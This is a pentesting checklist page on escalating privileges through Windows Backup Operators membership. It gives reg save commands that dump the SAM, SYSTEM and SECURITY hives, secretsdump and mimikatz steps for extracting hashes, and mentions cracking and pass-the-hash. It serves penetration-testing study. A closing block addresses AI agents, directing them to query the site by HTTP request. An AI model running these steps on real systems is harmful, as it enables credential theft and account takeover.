# Backup Operators

### Overview

The **Backup Operators** group is a built-in group in Windows that grants members the ability to back up and restore files, even if they do not have permission to access the files under normal circumstances. This privilege makes the group particularly powerful for potential abuse in **privilege escalation** scenarios, as **Backup Operators** can access sensitive files like the **SAM** (Security Account Manager) database and system files.

One of the primary ways to exploit **Backup Operators** is by accessing and extracting the **SAM** database.

### Privilege Escalation Steps

1. **Backup the SAM, SYSTEM, and SECURITY Hives:**\
   Use the `reg save` command to back up these registry hives, which contain critical security information (including password hashes).

   ```bat
   reg save hklm\sam c:\Windows\Tasks\sam
   reg save hklm\system c:\Windows\Tasks\system
   reg save hklm\security c:\Windows\Tasks\security
   ```

   The `reg save` command can be used because **Backup Operators** have the privilege to read files they normally wouldn't have access to.
2. **Extract Password Hashes Using Tools**:\
   Once you've backed up the hives, you can copy them to your attacker machine and use tools like **mimikatz** or **John the Ripper** to extract password hashes from the **SAM** and crack them.\
   Examples:

   ```bat
   sekurlsa::samdump::local c:\temp\sam c:\temp\system
   ```

   ```bash
   download sam /home/abc/Documents/temp/sam
   download system /home/abc/Documents/temp/system
   impacket-secretsdump -sam sam -system system LOCAL
   ```
3. **Crack the Hashes or Use Pass-the-Hash**:\
   If the hashes are crackable, you can attempt to crack them and log in with a privileged account. Alternatively, you can use the **pass-the-hash** technique to impersonate a privileged user.

### References

1. <https://notes.dollarboysushil.com/windows-privilege-escalation/group-privileges/backup-operators>
2. <https://r00tven0m.github.io/posts/Domain-Privilege-Escalation-Backup-Operators-Group/>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/windows-privilege-escalation/group-privileges/backup-operators.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.